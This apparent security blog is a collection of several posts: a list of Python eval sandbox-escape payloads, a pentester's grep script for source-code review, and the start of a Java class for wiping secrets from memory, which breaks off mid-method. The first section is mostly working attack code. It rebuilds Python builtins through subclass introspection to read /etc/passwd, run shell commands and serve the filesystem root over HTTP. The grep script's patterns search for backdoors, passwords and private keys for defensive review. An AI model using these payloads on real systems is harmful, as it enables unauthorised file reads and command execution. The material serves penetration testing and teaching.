print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
exit()
sum(xrange(-999999999,99999999))

file('/etc/passwd').read()
open('/etc/passwd').read()
__import__['fileinput'].input('/etc/passwd')
__import__['os'].system('cat /etc/passwd')
__import__['os'].popen('/etc/passwd', 'r').read()
__import__['os'].system('cd /; python -m SimpleHTTPServer')

print(file('/etc/passwd').read())
print(open('/etc/passwd').read())
print(__import__['fileinput'].input('/etc/passwd'))
print(__import__['os'].system('cat /etc/passwd'))
print(__import__['os'].popen('/etc/passwd', 'r').read())
print(__import__['os'].system('cd /; python -m SimpleHTTPServer'))

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['exit']()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['xrange'](-999999999,99999999))

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer')

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))

Ok, what about Python 3 now? I haven’t found a reliable way to restore the builtins on Python 3. The following code is taken from Reddit and should work in general:

lookup = lambda n: [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == n][0]
try:
    lookup('Codec')().decode('')
except lookup('BaseException') as e:
    del lookup
    __builtins__ = e.__traceback__.tb_next.tb_frame.f_globals['__builtins__']

But because try/except blocks are not allowed to be inlined and eval can not parse multiple lines (SyntaxError: invalid syntax for try), this technique can’t be used:

s = """try:
    int("a")
except:
    print(123)
"""
eval(s, {'__builtins__':{}})

So we would have to find another way to restore the builtins or we have to properly build a code object like we did for the segmentation fault above. I guess another thing for my TODO list.
UPDATE 19th Feb 2013:
Talked to Ned, he wrote a nice script to find builtins. And here we go for python 3.3:

>>> x = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('aaaa')"
>>> eval(x, {'__builtins__':{}})
aaaa
>>>

So the payloads for python 3 are:

print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
exit()
sum(xrange(-999999999,99999999))

file('/etc/passwd').read()
open('/etc/passwd').read()
__import__['fileinput'].input('/etc/passwd')
__import__['os'].system('cat /etc/passwd')
__import__['os'].popen('/etc/passwd', 'r').read()
__import__['os'].system('cd /; python -m SimpleHTTPServer')

print(file('/etc/passwd').read())
print(open('/etc/passwd').read())
print(__import__['fileinput'].input('/etc/passwd'))
print(__import__['os'].system('cat /etc/passwd'))
print(__import__['os'].popen('/etc/passwd', 'r').read())
print(__import__['os'].system('cd /; python -m SimpleHTTPServer'))

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['exit']()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['xrange'](-999999999,99999999))

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('/etc/passwd').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('/etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat /etc/passwd')
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('/etc/passwd', 'r').read()
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd /; python -m SimpleHTTPServer')

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('/etc/passwd').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('/etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat /etc/passwd'))
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('/etc/passwd', 'r').read())
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd /; python -m SimpleHTTPServer'))

Of course now that you have Ned’s script, you can simply find other places where the builtins live, the Pattern is just one example. E.g. if one of theses strings ever gets blacklisted (think web application firewall).

Source Code Review Grep Script

Edit: This evolved over years, see the CRASS project.

As a pentester you sometimes get access to the source code of the application you are reviewing. Sometimes you can look manually through the files, but sometimes you get million lines of code and you don’t have time to spend sitting there, reading line after line.

The first approach that came to my mind was to use static code analysis tools. There are a lot of them out there, you can find lists of tools on the flawfinder page or you can have a look at Wikipedia’s list of tools for static code analysis. It definitely makes sense to use these tools, but it needs time to download/compile them and most of them are written for one particular language.

You will be reading a lot of code. If you want to do yourself a favour, use an IDE like eclipse to look at the code. Especially when looking at Java code you will find yourself quite often changing from one class to another and changing between files. With eclipse you only need one click for that. But still, you need different IDEs for different programming languages. So this is still not a universal approach.

As a penetration tester you often want to find the interesting parts of the code. To name some interesting things: everything related to cryptography, encryption, SQL queries, file read and writes, URLs and sockets, obfuscation, passwords and so on. And there is one really universal tool that let us find these parts of the code: grep.

The script I wrote here is pretty focused on Java/Android and Objective-C/iOS. But I also got some JSP and spring java framework specific code. So here we go, no rocket science, but I hope it’s helpful for someone in the future.

#!/bin/bash
#
# A simple code greper...
#
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# <floyd at floyd dot ch> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return
# floyd http://floyd.ch @floyd_ch <floyd at floyd dot ch>
# August 2012
# ----------------------------------------------------------------------------
#
# Tested under MAC OSX ONLY!
#
# This script isn't very advanced - exactly what's needed if you don't know where to start.
# It is not a real static analysis tool and it's not in any way a replacement for all the cool
# tools out there (checkstyle, jlint, etc.)
#
 
 
if [ $# -ne 1 ]
then
  echo "Usage: `basename $0` directory-to-grep-through"
  exit 0
fi
###
#OPTIONS
###
#Open the colored outputs with "less -R" or cat, otherwise remove --color=always
ADDITIONAL_GREP_ARGUMENTS="-A 1 -B 3 --color=always"
TARGET="./grep-output"
#In my opinion I would always leave all the options below here on true,
#because I did find strange android code in iphone apps and vice versa. I would only
#change it if the greping needs very long, you are greping a couple of hundret apps
#or if you have any other performance issues with this script.
DO_JAVA=true
DO_SPRING=true
DO_JSP=true
DO_ANDROID=true
DO_IOS=true
DO_PHP=true
DO_GENERAL=true
###
#END OPTIONS
#Normally you don't have to change anything below here...
###
 
GREP_ARGUMENTS="-nrP"
STANDARD_GREP_ARGUMENTS=$ADDITIONAL_GREP_ARGUMENTS" "$GREP_ARGUMENTS
SEARCH_FOLDER=$1
mkdir $TARGET
 
echo "Your standard grep arguments: $STANDARD_GREP_ARGUMENTS"
echo "Output will be put into this folder: $TARGET"
echo "You are currently greping through folder: $SEARCH_FOLDER"
sleep 2
 
#The Java stuff
if [ $DO_JAVA ]; then
    SEARCH_STRING='javax.crypto|bouncy.*?castle|new\sSecretKeySpec\(|messagedigest'
    OUTFILE="java_general_crypto.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
     
    SEARCH_STRING='toString\(\) *==|== *toString\(\)|" *==|== *"'
    OUTFILE="java_general_wrong_string_comparison.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #String comparison has to be done with .equals() in Java, not with ==
     
    SEARCH_STRING='\.exec\('
    OUTFILE="java_general_exec.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
     
    SEARCH_STRING='java\.net\.|java\.io\.|javax\.servlet|org\.apache\.http'
    OUTFILE="java_general_io.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
     
    SEARCH_STRING='@Entity|@ManyToOne|@OneToMany|@OneToOne|@Table|@Column'
    OUTFILE="java_persistent_beans.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #Special case, we only want to know matching files to know which beans get persisted, therefore -l to output matching files
    grep -l $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Find out which Java Beans get persisted with javax.persistence
     
    SEARCH_STRING='@Table\(|@Column\('
    OUTFILE="java_persistent_tables_and_columns_in_database.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #Case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #The source code shows the database table/column names... e.g. if you find a sql injection later on
     
    SEARCH_STRING='string .{0,10}password|string .{0,10}secret|string .{0,10}key|string .{0,10}cvv|string .{0,10}user|string .{0,10}hash(?!(table|map|set|code))|string .{0,10}passcode|string .{0,10}passphrase|string .{0,10}user|string .{0,10}pin|string .{0,10}credit'
    OUTFILE="java_confidential_data_in_strings.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #http://docs.oracle.com/javase/1.5.0/docs/guide/security/jce/JCERefGuide.html#PBEEx
fi
 
#The Java Spring specific stuff
if [ $DO_SPRING ]; then
    SEARCH_STRING="DataBinder\.setAllowedFields"
    OUTFILE="java_spring_mass_assignment.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #see e.g. http://blog.fortify.com/blog/2012/03/23/Mass-Assignment-Its-Not-Just-For-Rails-Anymore
fi
 
#The JSP specific stuff
if [ $DO_JSP ]; then
    SEARCH_STRING="escape\s*=\s*\"?\s*false|escape\s*=\s*\'?\s*false"
    OUTFILE="java_jsp_xss.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #can introduce XSS when using escape=false
     
    SEARCH_STRING="<s:file "
    OUTFILE="java_jsp_file_upload.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
fi
 
#The Android specific stuff
if [ $DO_ANDROID ]; then
 
    SEARCH_STRING='\.printStackTrace\(|Log\.(e|w|i|d|v)\('
    OUTFILE="android_logging.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #printStackTrace Logs to Android log, information leakage, etc.
     
    SEARCH_STRING='MODE_|\.openFile\(|\.openOrCreate|\.getDatabase\(|\.openDatabase\(|\.getShared|\.getCache|\.getExternalCache|query\(|rawQuery\(|compileStatement\('
    OUTFILE="android_access.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Android file io and access things
     
    SEARCH_STRING='<intent-filter>|\.getIntent\(\)\.getData\(\)|RunningAppProcessInfo'
    OUTFILE="android_intents.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
     
fi
 
#The iOS specific stuff
 
if [ $DO_IOS ]; then
    SEARCH_STRING='NSFileProtection|NSFileManager|NSPersistantStoreCoordinator|NSData' #sqlite, see sql.txt
    OUTFILE="ios_file_access.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #File protection APIs
 
    SEARCH_STRING='kSecAttrAccessible|SecItemAdd|KeychainItemWrapper|Security\.h'
    OUTFILE="ios_keychain.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Keychain stuff
 
    SEARCH_STRING='CFBundleURLSchemes|kCFStream|CFFTPStream|CFHTTP|CFNetServices|FTPURL|IOBluetooth'
    OUTFILE="ios_network.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Network stuff
 
    SEARCH_STRING='NSLog\('
    OUTFILE="ios_logging.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
 
    SEARCH_STRING='initWithFormat:|informativeTextWithFormat:|format:|stringWithFormat:|appendFormat:|predicateWithFormat:|NSRunAlertPanel'
    OUTFILE="ios_string_format_functions.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #just check if the first argument to these functions are user controlled, that could be a format string vulnerability
 
    SEARCH_STRING='handleOpenURL:|openURL:'
    OUTFILE="ios_url_handler.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
fi

#The PHP stuff

if [ $DO_PHP ]; then
    SEARCH_STRING='\$_GET|\$_POST'
    OUTFILE="php_get_post.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    
    SEARCH_STRING='crypt\('
    OUTFILE="php_crypt_call.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
fi

#The general stuff
 
if [ $DO_GENERAL ]; then
    SEARCH_STRING='\b[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,4}\b'
    OUTFILE="email.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Email addresses
    
    SEARCH_STRING='todo|workaround'
    OUTFILE="todo_workaround.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
 
    SEARCH_STRING='hack|crack|exploit|bypass|backdoor|backd00r'
    OUTFILE="exploit.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" | grep -vE 'Ack|setCdrBackdoor' | grep -viE 'imageshack' > $TARGET/$OUTFILE
 
    SEARCH_STRING='https?://'
    OUTFILE="https_and_http_urls.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #All URIs
 
    SEARCH_STRING='http://|ftp://|imap://|file://'
    OUTFILE="no_ssl_uris.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Non-SSL URIs
 
    SEARCH_STRING='malloc\(|realloc\('
    OUTFILE="initialisation.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #rather rare bug, but see issues CVE-2010-0041 and CVE-2010-0042... could also happen in java/android native code...
 
    SEARCH_STRING='memcpy\(|memset\(|strcat\(|strcpy\(|strncat\(|strncpy\(|sprintf\(|gets\('
    OUTFILE="insecure_c_functions.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #memcpy
    #memset
    #strcat --> strlcat
    #strcpy --> strlcpy
    #strncat --> strlcat
    #strncpy --> strlcpy
    #sprintf --> snprintf
    #vsprintf --> vsnprintf
    #gets --> fgets
 
    SEARCH_STRING='default.?password|passwo?r?d|passcode|hash.?(?!(table|map|set|code))|pass.?phrase|salt|encryption.?key|encrypt.?key|BEGIN CERTIFICATE---|PRIVATE KEY---|Proxy-Authorization|pin'
    OUTFILE="keys.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
 
    SEARCH_STRING='root.*?detection|rooted.*?Device|is.*?rooted|detect.*?root|jail.*?break'
    OUTFILE="root.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
 
    SEARCH_STRING='sql.{0,10}injection|xss|click.{0,10}jacking|xsrf|directory.{0,10}listing|buffer.{0,10}overflow|obfuscate'
    OUTFILE="hacking_techniques.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #e.g. find prevention techniques...
 
    SEARCH_STRING='`.{2,100}`'
    OUTFILE="backticks.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #-I for binaries=without-match
    grep -I $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #anything between backticks is suspicious, thinking about command execution in perl scripts in cgi-bin directories...
    SEARCH_STRING='location\.hash|location\.href|location\.pathname|location\.search|eval\(|\.appendChild\(|document\.write\(|document\.writeln\(|\.innerHTML\s*?=|\.outerHTML\s*?='
    OUTFILE="dom_xss.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    #case sensitive...
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
 
    SEARCH_STRING='SELECT.*?FROM|INSERT.*?INTO|DELETE.*?WHERE|sqlite'
    OUTFILE="sql.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
 
    SEARCH_STRING='^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$'
    OUTFILE="base64.txt"
    #case sensitive, the regex is insensitive anyway
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #Sometimes developers try to hide stuff in base64...
 
    SEARCH_STRING='GNU\sGPL|GPLv2|GPLv3|GPL\sVersion|General\sPublic\sLicense'
    OUTFILE="gpl.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
    #GPL violation, not security related, but your customer might be happy to know such stuff...
 
    SEARCH_STRING='stupid|fuck|shit|crap'
    OUTFILE="swear.txt"
    echo "Searching for $SEARCH_STRING --> writing to $OUTFILE"
    grep -i $STANDARD_GREP_ARGUMENTS "$SEARCH_STRING" "$SEARCH_FOLDER" > $TARGET/$OUTFILE
fi
 
echo "Done grep. Results in $TARGET. Have a grepy day."

Of course the script produces a lot of false positives, but it should be a tool that supports you in your manual analysis. I’m sure there are a million more interesting strings we can add to the script. If you think something is missing, leave it in the comments and I’ll add it.

Oh and if you already looked at one version of a source code and you get a new version, you better use the “diff” command line tool and first have a look at the parts that changed.

A Weird Idea – Java, Strings and Memory

Disclaimer: I’m not a Java internals specialist. Let me know if I got a point wrong here.

Wiping sensitive information when you don’t need it anymore is a very basic security rule. It makes sense to everyone when we talk about hard discs, but the same rule should be applied to memory (RAM). While memory management is quite straight forward in C derived languages (eg. allocate some memory, override it with random bytes when the sensitive information is not needed anymore), it’s quite hard to do it in Java. Is it even possible? Java Strings are immutable, that means you can not change the memory allocated for a String. The Java VM will make a copy of the String and change the copy. So from this perspective, Strings are not a good way to store sensitive information. So let’s do it in char arrays I thought and wrote the following Java class:

/**
* ----------------------------------------------------------------------------
* &quot;THE BEER-WARE LICENSE&quot; (Revision 42):
* &lt;floyd at floyd dot ch&gt; wrote this file. As long as you retain this notice you
* can do whatever you want with this stuff. If we meet some day, and you think
* this stuff is worth it, you can buy me a beer in return
* floyd http://floyd.ch @floyd_ch &lt;floyd at floyd dot ch&gt;
* August 2012
* ----------------------------------------------------------------------------
**/

import java.util.Arrays;
import java.io.IOException;
import java.io.Serializable;
import java.lang.Exception;

/**
 * ATTENTION: This method is only ASCII safe, not Unicode.
 * It should be used to store sensitive information which are ASCII
 * 
 * This class keeps track of the passed in char[] and wipes all the old arrays
 * whenever they are changed. This means:
 * 
 * char[] r1 = {0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
 * SecureString k = new SecureString(r1);
 * k.destroy();
 * System.out.println(r1); //Attention! r1 will be {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
 * 
 * char[] r2 = {0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
 * SecureString k = new SecureString(r2);
 * k.append('C');
 * System.out.println(r2); //Attention! r2 will be {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
 * System.out.println(k.getByteArray()); //correct
 * 
 * General rule for this class:
 * - Never call toString() of this class. It will just return null:
 * char[] r3 = {0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
 * SecureString k = new SecureString(r3);
 * System.out.println(k); //will print null, because it calls toString()
 * 
 * - Choose the place to do the destroy() wisely. It should be done when an operation
 * is finished and the string is not needed anymore.
 */

public class SecureString implements Serializable{
	private static final long serialVersionUID = 1L;
	private char[] charRepresentation;
	private char[] charRepresentationLower;
	private byte[] byteRepresentation;
	private boolean isDestroyed = false;
	private int length=0;
	private final static int OBFUSCATOR_BYTE = 0x55;
	
	/**
	 * After calling the constructor you should NOT wipe the char[]
	 * you just passed in (the stringAsChars reference)
	 * @param stringAsChars
	 */
	public SecureString(char[] stringAsChars){
		//Pointing to the same address as original char[]
		this.length = stringAsChars.length;
		this.initialise(stringAsChars);
	}
	
	/**
	 * After calling the constructor you should NOT wipe the byte[]
	 * you just passed in (the stringAsBytes reference)
	 * @param stringAsBytes
	 */
	public SecureString(byte[] stringAsBytes){
		//Pointing to the same address as original byte[]
		this.length = stringAsBytes.length;
		this.initialise(stringAsBytes);
	}
	
	/**
	 * @return length of the string
	 */
	public int length(){
		return this.length;
	}
	
	/**
	 * Initialising entire object based on a char array
	 * @param stringAsChars
	 */
	private void initialise(char[] stringAsChars){
		this.length = stringAsChars.length;
		charRepresentation = stringAsChars; 
		charRepresentationLower = new char[stringAsChars.length];
		byteRepresentation = new byte[stringAsChars.length];
		for(int i=0; i&lt;stringAsChars.length; i++){
			charRepresentationLower[i] = Character.toLowerCase(charRepresentation[i]);
			byteRepresentation[i] = (byte)charRepresentation[i];
		}
	}
	
	/**
	 * Initializing entire object based on a byte array
	 * @param stringAsBytes
	 */
	private void initialise(byte[] stringAsBytes){
		this.length = stringAsBytes.length;
		byteRepresentation = stringAsBytes;
		charRepresentation = new char[stringAsBytes.length];
		charRepresentationLower = new char[stringAsBytes.length];
		for(int i=0; i&lt;stringAsBytes.length; i++){
			charRepresentation[i] = (char) byteRepresentation[i];
			charRepresentationLower[i] = Character.toLowerCase(charRepresentation[i]);
		}
	}
	
	/**
	 * We first obfuscate the string by XORing with OBFUSCATOR_BYTE
	 * So it doesn't get serialized as plain text. THIS METHOD
	 * WILL DESTROY THIS OBJECT AT THE END.
	 * @param out
	 * @throws IOException
	 */
	private void writeObject(java.io.ObjectOutputStream out) throws IOException{		
		out.writeInt(byteRepresentation.length);
		for(int i = 0; i &lt; byteRepresentation.length; i++ ){
